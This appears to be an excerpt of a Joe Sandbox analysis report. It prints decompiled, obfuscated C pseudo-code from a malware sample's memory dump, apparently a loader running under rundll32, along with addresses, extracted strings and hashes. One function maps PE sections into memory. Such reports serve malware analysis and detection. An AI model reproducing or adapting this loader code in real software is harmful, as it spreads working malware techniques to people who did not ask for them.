				 *(_t380 + 0x60) =  *(_t380 + 0x60) ^ 0xd79df08f;
				 *(_t380 + 0x30) = 0x4848;
				 *(_t380 + 0x30) =  *(_t380 + 0x30) ^ 0x9b476349;
				 *(_t380 + 0x30) =  *(_t380 + 0x30) ^ 0x919ac53c;
				 *(_t380 + 0x30) =  *(_t380 + 0x30) ^ 0x0adda027;
				 *(_t380 + 0x34) = 0xf09c;
				 *(_t380 + 0x34) =  *(_t380 + 0x34) << 0xc;
				_t374 = 0x28650a76;
				_t368 =  *((intOrPtr*)(_t380 + 0x98));
				_t334 =  *((intOrPtr*)(_t380 + 0x98));
				_t378 =  *((intOrPtr*)(_t380 + 0x98));
				 *(_t380 + 0x34) =  *(_t380 + 0x34) * 0x3e;
				 *(_t380 + 0x34) =  *(_t380 + 0x34) ^ 0xa45c8003;
				while(_t336 != 0xd3df7e1) {
					if(_t336 == 0x132cc48f) {
						E0020F536( *(_t380 + 0x34),  *(_t380 + 0x58),  *(_t380 + 0x84), _t368);
						_t336 = 0xd3df7e1;
						continue;
					}
					if(_t336 == 0x159b7bb7) {
						_push(_t336);
						_push(_t336);
						 *((intOrPtr*)(_t380 + 0xa0)) = 0x1000;
						_t368 = E00208736(0x1000);
						__eflags = _t368;
						_t336 =  !=  ? _t374 : 0xd3df7e1;
						continue;
					}
					if(_t336 == 0x18c2a499) {
						_t319 = E0020B566(_t336,  *(_t380 + 0x44) | 0x00000006,  *(_t380 + 0x74),  *((intOrPtr*)(_t380 + 0x68)), 1,  *(_t380 + 0x90), _t336,  *((intOrPtr*)(_t380 + 0x28)),  *(_t380 + 0x7c), 0x2000000,  *(_t380 + 0x44),  *((intOrPtr*)(_t380 + 0x9c)),  *(_t380 + 0x38), _t380 + 0xb0);
						_t334 = _t319;
						_t380 = _t380 + 0x30;
						__eflags = _t319 - 0xffffffff;
						if(__eflags == 0) {
							L29:
							__eflags = 0;
							return 0;
						}
						_t336 = 0x159b7bb7;
						continue;
					}
					if(_t336 == 0x1a0fbde3) {
						E00213E3F(_t336, _t380 + 0xb4, __eflags,  *(_t380 + 0x48),  *((intOrPtr*)(_t380 + 0x5c)));
						_t322 = E002028CE(_t380 + 0xbc,  *(_t380 + 0x60),  *(_t380 + 0x30));
						_t378 = _t322;
						_t380 = _t380 + 0xc;
						_t336 = 0x18c2a499;
						 *((short*)(_t322 - 2)) = 0;
						continue;
					}
					if(_t336 == 0x262df760) {
						_t336 = 0x1a0fbde3;
						continue;
					}
					if(_t336 != _t374) {
						L28:
						__eflags = _t336 - 0x1c26cb40;
						if(__eflags != 0) {
							continue;
						}
						goto L29;
					}
					_t325 = E00216319( *(_t380 + 0x44), _t334,  *((intOrPtr*)(_t380 + 0xc4)),  *(_t380 + 0x74),  *(_t380 + 0x7c),  *(_t380 + 0x84), _t368,  *(_t380 + 0x38), _t336,  *(_t380 + 0x7c), _t336, _t336,  *(_t380 + 0x94), _t380 + 0xac);
					_t380 = _t380 + 0x30;
					if(_t325 == 0) {
						_t326 =  *((intOrPtr*)(_t380 + 0x9c));
						L18:
						__eflags = _t326;
						if(__eflags == 0) {
							_t336 = _t374;
						} else {
							_t327 =  *0x21ca30; // 0x0
							E00218A4B( *(_t380 + 0x90),  *(_t380 + 0x94),  *(_t380 + 0x84),  *((intOrPtr*)(_t327 + 8)),  *(_t380 + 0x8c));
							_t380 = _t380 + 0xc;
							_t336 = 0x132cc48f;
						}
						continue;
					}
					_t376 = _t368;
					while( *((intOrPtr*)(_t376 + 4)) != 4 || E00208624( *(_t380 + 0x44), _t378,  *(_t380 + 0x78), _t376 + 0xc) != 0) {
						_t329 =  *_t376;
						if(_t329 == 0) {
							_t326 =  *((intOrPtr*)(_t380 + 0x9c));
							L17:
							_t374 = 0x28650a76;
							goto L18;
						}
						_t376 = _t376 + _t329;
					}
					_t326 = 1;
					 *((intOrPtr*)(_t380 + 0x9c)) = 1;
					goto L17;
				}
				E00214F7D( *(_t380 + 0x60),  *(_t380 + 0x30), _t334);
				_t336 = 0x1c26cb40;
				goto L28;
			}

0x0020e37d
0x0020e38a
0x0020e393
0x0020e39a
0x0020e39f
0x0020e3a7
0x0020e3ac
0x0020e3b4
0x0020e3bc
0x0020e3c4
0x0020e3c9
0x0020e3d1
0x0020e3d6
0x0020e3de
0x0020e3e6
0x0020e3f6
0x0020e401
0x0020e404
0x0020e408
0x0020e410
0x0020e418
0x0020e41d
0x0020e425
0x0020e42d
0x0020e435
0x0020e43d
0x0020e442
0x0020e44a
0x0020e452
0x0020e45a
0x0020e467
0x0020e46b
0x0020e473
0x0020e47b
0x0020e483
0x0020e48b
0x0020e493
0x0020e49b
0x0020e4a8
0x0020e4ac
0x0020e4b4
0x0020e4c4
0x0020e4c8
0x0020e4d0
0x0020e4d8
0x0020e4e0
0x0020e4e8
0x0020e4f0
0x0020e4f8
0x0020e500
0x0020e505
0x0020e50d
0x0020e515
0x0020e521
0x0020e524
0x0020e528
0x0020e530
0x0020e53b
0x0020e546
0x0020e551
0x0020e559
0x0020e55e
0x0020e563
0x0020e56b
0x0020e573
0x0020e57d
0x0020e582
0x0020e58a
0x0020e592
0x0020e597
0x0020e59f
0x0020e5a7
0x0020e5af
0x0020e5b7
0x0020e5bf
0x0020e5c7
0x0020e5cf
0x0020e5d7
0x0020e5df
0x0020e5e7
0x0020e5ef
0x0020e5f7
0x0020e5ff
0x0020e607
0x0020e60f
0x0020e61e
0x0020e61f
0x0020e629
0x0020e62d
0x0020e635
0x0020e63d
0x0020e645
0x0020e64d
0x0020e655
0x0020e668
0x0020e66f
0x0020e67a
0x0020e682
0x0020e68a
0x0020e68f
0x0020e697
0x0020e69f
0x0020e6a4
0x0020e6ac
0x0020e6bf
0x0020e6c6
0x0020e6d1
0x0020e6dc
0x0020e6e7
0x0020e6f2
0x0020e6fa
0x0020e6ff
0x0020e707
0x0020e712
0x0020e71d
0x0020e728
0x0020e730
0x0020e738
0x0020e73d
0x0020e742
0x0020e74a
0x0020e752
0x0020e75a
0x0020e75f
0x0020e767
0x0020e77a
0x0020e781
0x0020e78c
0x0020e799
0x0020e79d
0x0020e7a5
0x0020e7ad
0x0020e7b5
0x0020e7bd
0x0020e7c5
0x0020e7cd
0x0020e7d5
0x0020e7da
0x0020e7e4
0x0020e7eb
0x0020e7f2
0x0020e7f9
0x0020e7fd
0x0020e805
0x0020e817
0x0020ea0c
0x0020ea13
0x00000000
0x0020ea13
0x0020e823
0x0020e9d2
0x0020e9d3
0x0020e9d9
0x0020e9ea
0x0020e9ed
0x0020e9f4
0x00000000
0x0020e9f4
0x0020e82f
0x0020e9a9
0x0020e9ae
0x0020e9b0
0x0020e9b3
0x0020e9b6
0x0020ea3d
0x0020ea40
0x0020ea49
0x0020ea49
0x0020e9bc
0x00000000
0x0020e9bc
0x0020e83b
0x0020e93e
0x0020e952
0x0020e957
0x0020e959
0x0020e95e
0x0020e963
0x00000000
0x0020e963
0x0020e847
0x0020e925
0x00000000
0x0020e925
0x0020e84f
0x0020ea31
0x0020ea31
0x0020ea37
0x00000000
0x00000000
0x00000000
0x0020ea37
0x0020e88c
0x0020e891
0x0020e896
0x0020e8cf
0x0020e8e4
0x0020e8e4
0x0020e8e6
0x0020e91e
0x0020e8e8
0x0020e8ef
0x0020e90c
0x0020e911
0x0020e914
0x0020e914
0x00000000
0x0020e8e6
0x0020e898
0x0020e89a
0x0020e8b9
0x0020e8bd
0x0020e8d8
0x0020e8df
0x0020e8df
0x00000000
0x0020e8df
0x0020e8bf
0x0020e8bf
0x0020e8c5
0x0020e8c6
0x00000000
0x0020e8c6
0x0020ea26
0x0020ea2c
0x00000000

Strings

o, xrefs: 0020E712
ve(, xrefs: 0020E8DF
?, xrefs: 0020E6E7
HH, xrefs: 0020E7AD
|E, xrefs: 0020E5AF
^, xrefs: 0020E59F
&!, xrefs: 0020E74A
h|, xrefs: 0020E483
M:, xrefs: 0020E505
ve(, xrefs: 0020E7DA
n`, xrefs: 0020E44A
w]4S, xrefs: 0020E56B

Memory Dump Source

Source File: 00000007.00000002.2087918184.0000000000201000.00000020.00000001.sdmp, Offset: 00200000, based on PE: true

Associated: 00000007.00000002.2087915544.0000000000200000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2087930443.000000000021C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_200000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID: h|$&!$?$HH$M:$^$n`$ve($ve($w]4S$|E$o
API String ID: 823142352-1348462970
Opcode ID: 2d8d0d828edd37519115c00dbeb26344ecec480237b802b80b60f19e7194843b
Instruction ID: 38fdddc148950070f2e31f7b4205b6737e334083cccc83a7ffd7adcccf092402
Opcode Fuzzy Hash: 2d8d0d828edd37519115c00dbeb26344ecec480237b802b80b60f19e7194843b
Instruction Fuzzy Hash: 8EF13F711183819FE7A8CF25C54AA5BBBF1BBC4708F108E1DE1DA862A1D7B58959CF03

Uniqueness

Uniqueness Score: -1.00%

Function 00216DB9, Relevance: 15.2, Strings: 12, Instructions: 224
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E00216DB9(void* __ecx, void* __edi, void* __ebp, void* __eflags, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v4;
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				void* _t224;
				void* _t243;
				void* _t256;
				void* _t264;
				void* _t288;
				signed int _t290;
				signed int _t291;
				signed int _t292;
				signed int _t293;
				signed int _t294;
				void* _t295;
				void* _t298;
				signed int* _t301;
				signed int* _t302;
				signed int* _t303;

				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(0);
				_push(3);
				_push(__ecx);
				E0020602B(_t224);
				_v4 = _v4 & 0x00000000;
				_v8 = 0x15bbba;
				_v72 = 0x7e44;
				_t290 = 0x3e;
				_v72 = _v72 * 0x56;
				_v72 = _v72 | 0xe97810d5;
				_v72 = _v72 ^ 0xe97a6add;
				_v56 = 0x50ea;
				_v56 = _v56 >> 9;
				_v56 = _v56 >> 8;
				_v56 = _v56 ^ 0x00008000;
				_v100 = 0x7422;
				_v100 = _v100 + 0xffff8791;
				_v100 = _v100 ^ 0x724a15f0;
				_v100 = _v100 + 0xd05;
				_v100 = _v100 ^ 0x8db5db48;
				_v48 = 0x2edd;
				_v48 = _v48 / _t290;
				_v48 = _v48 ^ 0x00005532;
				_v76 = 0xee3f;
				_v76 = _v76 + 0xffffe6cd;
				_v76 = _v76 + 0xffff5ce1;
				_v76 = _v76 ^ 0x00006965;
				_v104 = 0xa36d;
				_v104 = _v104 << 0xc;
				_v104 = _v104 + 0x5d19;
				_v104 = _v104 >> 1;
				_v104 = _v104 ^ 0x051bebf0;
				_v52 = 0xa852;
				_v52 = _v52 + 0xddb7;
				_v52 = _v52 ^ 0x00019bba;
				_v96 = 0xa4e6;
				_v96 = _v96 | 0xa6d42a45;
				_t291 = 0x2e;
				_v96 = _v96 * 0x22;
				_v96 = _v96 << 1;
				_v96 = _v96 ^ 0x507e3c16;
				_v40 = 0x2ce2;
				_v40 = _v40 + 0xffffe435;
				_v40 = _v40 ^ 0x00002c9b;
				_v64 = 0xad5e;
				_v64 = _v64 * 0xd;
				_v64 = _v64 >> 0xf;
				_v64 = _v64 ^ 0x00006dfc;
				_v68 = 0x15e2;
				_v68 = _v68 << 4;
				_v68 = _v68 + 0x971e;
				_v68 = _v68 ^ 0x0001ffd3;
				_v28 = 0x5912;
				_v28 = _v28 | 0xb77a8e9e;
				_v28 = _v28 ^ 0xb77a927a;
				_v32 = 0xb0a1;
				_v32 = _v32 >> 6;
				_v32 = _v32 ^ 0x000014c1;
				_v36 = 0x1527;
				_v36 = _v36 / _t291;
				_v36 = _v36 ^ 0x000058cb;
				_v92 = 0x32e5;
				_v92 = _v92 * 0x31;
				_v92 = _v92 + 0xffff00ec;
				_v92 = _v92 << 8;
				_v92 = _v92 ^ 0x08be8a0d;
				_v20 = 0xbd6f;
				_v20 = _v20 + 0xab45;
				_v20 = _v20 ^ 0x000148c7;
				_v24 = 0x6d6f;
				_t292 = 0x6d;
				_v24 = _v24 / _t292;
				_v24 = _v24 ^ 0x00002132;
				_v84 = 0xac46;
				_t293 = 0x2f;
				_v84 = _v84 * 0x6c;
				_v84 = _v84 + 0xe89f;
				_v84 = _v84 >> 7;
				_v84 = _v84 ^ 0x0000aacf;
				_v88 = 0x7aeb;
				_v88 = _v88 * 0x1d;
				_v88 = _v88 >> 0xb;
				_t294 = 0x7f;
				_v88 = _v88 / _t293;
				_v88 = _v88 ^ 0x00001cd5;
				_v60 = 0x8b82;
				_v60 = _v60 + 0xffffb5bd;
				_v60 = _v60 * 0x35;
				_v60 = _v60 ^ 0x000df53e;
				_v12 = 0x733f;
				_v12 = _v12 >> 3;
				_v12 = _v12 ^ 0x000065d0;
				_v16 = 0x6f84;
				_v16 = _v16 | 0x29e4272c;
				_v16 = _v16 ^ 0x29e452e1;
				_v80 = 0x4249;
				_v80 = _v80 >> 0xb;
				_v80 = _v80 / _t294;
				_v80 = _v80 >> 3;
				_v80 = _v80 ^ 0x00004a04;
				_v44 = 0x4ba5;
				_v44 = _v44 + 0xffffabaf;
				_v44 = _v44 ^ 0xfffff714;
				_t243 = E00213811(__ecx, _v48, _a8, _v76, _v104, _v52);
				_t256 = _t243;
				_t301 =  &(( &_v104)[0xb]);
				if(_t256 == 0) {
					return _t243;
				}
				_t295 = E00207EC5(_v96, _v40,  *((intOrPtr*)(_t256 + 0x50)), _v64, _v68, _v44, __ecx, _v100 | _v72);
				_t302 =  &(_t301[6]);
				if(_t295 == 0) {
					L7:
					return _t295;
				}
				E00212674(_v28, _v32,  *((intOrPtr*)(_t256 + 0x54)), _t295, _v36, _v92, _a8);
				_t303 =  &(_t302[5]);
				_t288 = ( *(_t256 + 0x14) & 0x0000ffff) + 0x18 + _t256;
				_t298 = ( *(_t256 + 6) & 0x0000ffff) * 0x28 + _t288;
				while(_t288 < _t298) {
					_t261 =  <  ?  *((void*)(_t288 + 8)) :  *((intOrPtr*)(_t288 + 0x10));
					E00212674(_v20, _v24,  <  ?  *((void*)(_t288 + 8)) :  *((intOrPtr*)(_t288 + 0x10)),  *((intOrPtr*)(_t288 + 0xc)) + _t295, _v84, _v88,  *((intOrPtr*)(_t288 + 0x14)) + _a8);
					_t303 =  &(_t303[5]);
					_t288 = _t288 + 0x28;
				}
				E0020F7D8(_t295, _t256);
				_t264 = _t295;
				if(E0020E05A(_t264, _t256) == 0) {
					_push(_t264);
					E00214FE8(_v56, _t295, _v60, _v12, _v16, _v80);
					_t295 = 0;
				}
				goto L7;
			}

0x00216dbe
0x00216dc5
0x00216dcc
0x00216dd3
0x00216dda
0x00216ddc
0x00216dde
0x00216ddf
0x00216de4
0x00216dee
0x00216df9
0x00216e08
0x00216e0b
0x00216e0f
0x00216e17
0x00216e1f
0x00216e27
0x00216e2c
0x00216e31
0x00216e39
0x00216e41
0x00216e49
0x00216e51
0x00216e59
0x00216e61
0x00216e71
0x00216e75
0x00216e7d
0x00216e85
0x00216e8d
0x00216e95
0x00216e9d
0x00216ea5
0x00216eaa
0x00216eb2
0x00216eb6
0x00216ebe
0x00216ec6
0x00216ece
0x00216ed6
0x00216ede
0x00216eeb
0x00216eec
0x00216ef0
0x00216ef4
0x00216efc
0x00216f04
0x00216f0c
0x00216f14
0x00216f21
0x00216f25
0x00216f2a
0x00216f32
0x00216f3a
0x00216f3f
0x00216f47
0x00216f4f
0x00216f57
0x00216f5f
0x00216f67
0x00216f6f
0x00216f74
0x00216f7c
0x00216f8a
0x00216f8e
0x00216f96
0x00216fa3
0x00216fa7
0x00216fb1
0x00216fb6
0x00216fbe
0x00216fc6
0x00216fce
0x00216fd6
0x00216fe4
0x00216fe9
0x00216fef
0x00216ff7
0x00217004
0x00217007
0x0021700b
0x00217013
0x00217018
0x00217020
0x0021702d
0x00217031
0x0021703c
0x0021703d
0x00217043
0x0021704b
0x00217053
0x00217060
0x00217064
0x0021706c
0x00217077
0x0021707f
0x0021708a
0x00217092
0x0021709a
0x002170a2
0x002170aa
0x002170b5
0x002170b9
0x002170be
0x002170c6
0x002170ce
0x002170d6
0x002170f5
0x002170fa
0x002170fc
0x00217101
0x002171ee
0x002171ee
0x0021712d
0x0021712f
0x00217134
0x002171e7
0x00000000
0x002171e7
0x00217157
0x00217160
0x0021716d
0x0021716f
0x002171aa
0x0021718d
0x0021719f
0x002171a4
0x002171a7
0x002171a7
0x002171b2
0x002171b9
0x002171c4
0x002171c6
0x002171dd
0x002171e5
0x002171e5
0x00000000

Strings

P, xrefs: 00216E1F
2, xrefs: 00216F96
2U, xrefs: 00216E75
z, xrefs: 00217020
IB, xrefs: 002170A2
om, xrefs: 00216FD6
2!, xrefs: 00216FEF
ei, xrefs: 00216E95
?s, xrefs: 0021706C
R), xrefs: 0021709A
"t, xrefs: 00216E39
,, xrefs: 00216EFC

Memory Dump Source

Source File: 00000007.00000002.2087918184.0000000000201000.00000020.00000001.sdmp, Offset: 00200000, based on PE: true

Associated: 00000007.00000002.2087915544.0000000000200000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2087930443.000000000021C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_200000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: "t$2!$2U$?s$IB$ei$om$,$2$P$R)$z
API String ID: 0-3377435326
Opcode ID: 3d0207934d40abbc6c7b225edab598dbb3739286f739d077276c6eaf293611b6
Instruction ID: 70c9d23ba18f08edef79b9be45087b84c39447ac9b0023d810f9f4ab6918ba3a
Opcode Fuzzy Hash: 3d0207934d40abbc6c7b225edab598dbb3739286f739d077276c6eaf293611b6
Instruction Fuzzy Hash: C4B123725187809FE364CF25C88994BFBF2BBD4358F50891CF695862A0C7B9C559CF42

Uniqueness

Uniqueness Score: -1.00%

Function 00206D9F, Relevance: 14.1, Strings: 11, Instructions: 340
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E00206D9F() {
				char _v520;
				char _v1040;
				signed int _v1044;
				intOrPtr _v1048;
				char _v1052;
				signed int _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				signed int _v1136;
				signed int _v1140;
				signed int _v1144;
				signed int _v1148;
				signed int _v1152;
				signed int _v1156;
				signed int _v1160;
				signed int _v1164;
				signed int _v1168;
				signed int _v1172;
				signed int _v1176;
				signed int _v1180;
				signed int _v1184;
				signed int _v1188;
				signed int _v1192;
				signed int _v1196;
				signed int _v1200;
				signed int _v1204;
				signed int _v1208;
				signed int _v1212;
				signed int _v1216;
				void* _t365;
				void* _t366;
				intOrPtr _t368;
				signed int _t376;
				intOrPtr* _t378;
				void* _t379;
				signed int _t384;
				intOrPtr _t385;
				intOrPtr* _t386;
				signed int _t387;
				signed int _t388;
				signed int _t389;
				signed int _t390;
				signed int _t391;
				void* _t392;
				void* _t399;
				void* _t405;
				intOrPtr _t419;
				void* _t427;
				signed int* _t432;

				_t432 =  &_v1216;
				_v1048 = 0x446f36;
				_v1044 = 0;
				_v1168 = 0x4c2;
				_v1168 = _v1168 + 0x4422;
				_v1168 = _v1168 << 0xe;
				_v1168 = _v1168 ^ 0x12390029;
				_v1108 = 0xe6e3;
				_v1108 = _v1108 << 7;
				_v1108 = _v1108 ^ 0x80737181;
				_v1140 = 0x5a14;
				_v1140 = _v1140 + 0xffff6ad9;
				_v1140 = _v1140 + 0x3f04;
				_v1140 = _v1140 ^ 0x000003f3;
				_v1152 = 0xde22;
				_v1056 = 0;
				_t427 = 0x1cf5a099;
				_t387 = 0xc;
				_v1152 = _v1152 / _t387;
				_v1152 = _v1152 + 0x1888;
				_v1152 = _v1152 ^ 0x00005d3c;
				_v1072 = 0x75ae;
				_t388 = 0x55;
				_v1072 = _v1072 * 0x39;
				_v1072 = _v1072 ^ 0x001a1469;
				_v1160 = 0x6360;
				_v1160 = _v1160 << 0xa;
				_v1160 = _v1160 >> 0xe;
				_v1160 = _v1160 ^ 0x00005ec5;
				_v1204 = 0x5583;
				_v1204 = _v1204 ^ 0x85366cb5;
				_v1204 = _v1204 | 0x8d22480f;
				_v1204 = _v1204 + 0xffffa345;
				_v1204 = _v1204 ^ 0x8d362c42;
				_v1076 = 0x4501;
				_v1076 = _v1076 ^ 0x7eb858e4;
				_v1076 = _v1076 ^ 0x7eb84390;
				_v1176 = 0x178a;
				_v1176 = _v1176 >> 0xe;
				_v1176 = _v1176 * 0xb;
				_v1176 = _v1176 ^ 0x00005407;
				_v1196 = 0x1155;
				_v1196 = _v1196 << 0x10;
				_v1196 = _v1196 ^ 0x99db21f3;
				_v1196 = _v1196 << 8;
				_v1196 = _v1196 ^ 0x8e21cf72;
				_v1096 = 0x9447;
				_v1096 = _v1096 + 0xfffff759;
				_v1096 = _v1096 ^ 0x0000f307;
				_v1136 = 0x5f84;
				_v1136 = _v1136 | 0xcddc780f;
				_v1136 = _v1136 >> 5;
				_v1136 = _v1136 ^ 0x066ef8af;
				_v1104 = 0x8d89;
				_v1104 = _v1104 + 0xffff49e8;
				_v1104 = _v1104 ^ 0xffff9178;
				_v1060 = 0xefb9;
				_v1060 = _v1060 + 0xc1e0;
				_v1060 = _v1060 ^ 0x0001802f;
				_v1088 = 0x4e92;
				_v1088 = _v1088 / _t388;
				_v1088 = _v1088 ^ 0x00003d65;
				_v1180 = 0x8957;
				_v1180 = _v1180 ^ 0x92844c79;
				_v1180 = _v1180 >> 0xd;
				_v1180 = _v1180 + 0x6937;
				_v1180 = _v1180 ^ 0x0004ca08;
				_v1188 = 0xa977;
				_v1188 = _v1188 + 0xffff4939;
				_t389 = 0x2a;
				_v1188 = _v1188 / _t389;
				_v1188 = _v1188 + 0xff8b;
				_v1188 = _v1188 ^ 0x06195dc5;
				_v1184 = 0xd80a;
				_v1184 = _v1184 << 0xd;
				_v1184 = _v1184 | 0x4fc46678;
				_v1184 = _v1184 + 0xffff2565;
				_v1184 = _v1184 ^ 0x5fc4ec42;
				_v1144 = 0xea63;
				_v1144 = _v1144 >> 0xa;
				_v1144 = _v1144 + 0xffff7a6a;
				_v1144 = _v1144 ^ 0xffff3b56;
				_v1064 = 0xbe27;
				_v1064 = _v1064 << 0xc;
				_v1064 = _v1064 ^ 0x0be2654a;
				_v1100 = 0x1945;
				_v1100 = _v1100 ^ 0xac55a11c;
				_v1100 = _v1100 ^ 0xac55a0be;
				_v1156 = 0x9792;
				_v1156 = _v1156 << 3;
				_v1156 = _v1156 + 0xffff9949;
				_v1156 = _v1156 ^ 0x00042150;
				_v1124 = 0x4510;
				_v1124 = _v1124 + 0xffff8613;
				_v1124 = _v1124 | 0x934ed599;
				_v1124 = _v1124 ^ 0xffffb057;
				_v1208 = 0xd7d3;
				_t390 = 0x4a;
				_v1208 = _v1208 * 0x29;
				_v1208 = _v1208 << 7;
				_v1208 = _v1208 | 0x9b57b5c9;
				_v1208 = _v1208 ^ 0x9b5f9b7a;
				_v1164 = 0x3cc8;
				_v1164 = _v1164 + 0xffff7a64;
				_v1164 = _v1164 + 0xffff31bf;
				_v1164 = _v1164 ^ 0xfffea90e;
				_v1092 = 0xe652;
				_v1092 = _v1092 << 0xf;
				_v1092 = _v1092 ^ 0x732967ec;
				_v1200 = 0xc0e1;
				_v1200 = _v1200 ^ 0xc04a3a1a;
				_v1200 = _v1200 | 0x7efbebea;
				_v1200 = _v1200 ^ 0xfefb9216;
				_v1192 = 0x2d8c;
				_v1192 = _v1192 >> 7;
				_v1192 = _v1192 ^ 0x302961fe;
				_v1192 = _v1192 << 0xf;
				_v1192 = _v1192 ^ 0xb0d2939c;
				_v1132 = 0xbcbe;
				_v1132 = _v1132 | 0x9a03aa26;
				_v1132 = _v1132 << 4;
				_v1132 = _v1132 ^ 0xa03bfed3;
				_v1068 = 0x5b9d;
				_v1068 = _v1068 / _t390;
				_v1068 = _v1068 ^ 0x00000144;
				_v1172 = 0x2743;
				_v1172 = _v1172 >> 9;
				_v1172 = _v1172 + 0x7fd0;
				_v1172 = _v1172 ^ 0x00002a87;
				_v1116 = 0x6969;
				_t391 = 0x76;
				_v1116 = _v1116 / _t391;
				_v1116 = _v1116 << 0xa;
				_v1116 = _v1116 ^ 0x0003c98c;
				_v1212 = 0xb804;
				_v1212 = _v1212 + 0xffff4ff5;
				_v1212 = _v1212 << 0xd;
				_v1212 = _v1212 + 0x7e88;
				_v1212 = _v1212 ^ 0x00ffdfa3;
				_v1084 = 0x6753;
				_v1084 = _v1084 | 0x97d0336a;
				_v1084 = _v1084 ^ 0x97d00d97;
				_v1148 = 0xef82;
				_v1148 = _v1148 >> 2;
				_v1148 = _v1148 << 2;
				_v1148 = _v1148 ^ 0x0000cb2e;
				_v1112 = 0x5852;
				_v1112 = _v1112 >> 7;
				_v1112 = _v1112 ^ 0xfa80e3bf;
				_v1112 = _v1112 ^ 0xfa8084b8;
				_v1120 = 0x62fa;
				_v1120 = _v1120 >> 0xa;
				_v1120 = _v1120 << 3;
				_v1120 = _v1120 ^ 0x000065d7;
				_t384 = _v1056;
				_v1128 = 0x8139;
				_v1128 = _v1128 + 0xffff21ec;
				_v1128 = _v1128 ^ 0xad93553f;
				_v1128 = _v1128 ^ 0x526c8c2f;
				_v1080 = 0x16f9;
				_v1080 = _v1080 + 0xffffafc8;
				_v1080 = _v1080 ^ 0xffff87da;
				_v1216 = 0xd107;
				_v1216 = _v1216 << 0xa;
				_v1216 = _v1216 >> 0xb;
				_v1216 = _v1216 | 0x40b78e0e;
				_v1216 = _v1216 ^ 0x40b7ee8e;
				while(1) {
					L1:
					_t392 = 0x5c;
					while(1) {
						L2:
						_t365 = 0x201e73d8;
						do {
							L3:
							if(_t427 == 0xb9056ba) {
								_push(_v1176);
								_t366 = E0021889D(0x21c930, _v1076, __eflags);
								_t368 =  *0x21ca2c; // 0x495cc8
								__eflags = _t368 + 0x230;
								_t419 =  *0x21ca2c; // 0x495cc8
								E002029E3(_t419, 0x104, _t366, _v1196, _v1096, _v1136, _t368 + 0x230,  &_v1040, _v1104, _v1060);
								E00212025(_v1088, _t366, _v1180, _v1188);
								_t432 =  &(_t432[0xc]);
								_t427 = 0x176c6394;
								goto L17;
							} else {
								if(_t427 == 0x176c6394) {
									_t385 =  *0x21ca2c; // 0x495cc8
									_t386 = _t385 + 0x230;
									while(1) {
										__eflags =  *_t386 - _t392;
										if(__eflags == 0) {
											break;
										}
										_t386 = _t386 + 2;
										__eflags = _t386;
									}
									_t384 = _t386 + 2;
									_t427 = 0x2c3250cc;
									goto L2;
								} else {
									if(_t427 == 0x1cf5a099) {
										_push(_t392);
										_push(_t392);
										E0020C6C7(_v1152, _v1072,  &_v520, _t392, _v1160, _v1168, _v1204);
										_t432 =  &(_t432[7]);
										_t427 = 0xb9056ba;
										goto L1;
									} else {
										if(_t427 == 0x1e86e44b) {
											E002065A2(_v1052, _v1112, _v1120, _v1128, _v1080);
										} else {
											if(_t427 == _t365) {
												_t376 = E00210ADC( &_v1040, _v1132, _v1068);
												_pop(_t399);
												_t378 = E00201AC6(_v1172, _v1116, 2 + _t376 * 2, _v1052,  &_v1040, _t399, _v1212, _v1084, _v1148, _t384, _v1216);
												_t432 =  &(_t432[9]);
												__eflags = _t378;
												_t427 = 0x1e86e44b;
												_v1056 = 0 | __eflags == 0x00000000;
												while(1) {
													L1:
													_t392 = 0x5c;
													L2:
													_t365 = 0x201e73d8;
													goto L3;
												}
											} else {
												_t440 = _t427 - 0x2c3250cc;
												if(_t427 == 0x2c3250cc) {
													_push(_v1144);
													_t379 = E0021889D(0x21c9d0, _v1184, _t440);
													_pop(_t405);
													E00213EB3(_v1064, _t405, _t379, _v1100, _v1156, 0x21c9d0, _v1124, _v1208, 0x21c9d0, _v1164, 0x21c9d0, _v1140, _v1108,  &_v1052);
													_t427 =  ==  ? 0x201e73d8 : 0x22b0460c;
													E00212025(_v1092, _t379, _v1200, _v1192);
													_t432 =  &(_t432[0xf]);
													L17:
													_t365 = 0x201e73d8;
													_t392 = 0x5c;
												}
												goto L18;
											}
										}
									}
								}
							}
							L21:
							return _v1056;
							L18:
						} while (_t427 != 0x22b0460c);
						goto L21;
					}
				}
			}

0x00206d9f
0x00206da5
0x00206db2
0x00206dbb
0x00206dc3
0x00206dcb
0x00206dd0
0x00206dd8
0x00206de0
0x00206de5
0x00206ded
0x00206df5
0x00206dfd
0x00206e05
0x00206e0d
0x00206e19
0x00206e20
0x00206e2b
0x00206e30
0x00206e36
0x00206e3e
0x00206e46
0x00206e59
0x00206e5a
0x00206e61
0x00206e6c
0x00206e74
0x00206e79
0x00206e7e
0x00206e86
0x00206e8e
0x00206e96
0x00206e9e
0x00206ea6
0x00206eae
0x00206eb9
0x00206ec4
0x00206ecf
0x00206ed7
0x00206ee1
0x00206ee5
0x00206eed
0x00206ef5
0x00206efa
0x00206f02
0x00206f07
0x00206f0f
0x00206f1a
0x00206f25
0x00206f30
0x00206f38
0x00206f40
0x00206f45
0x00206f4d
0x00206f58
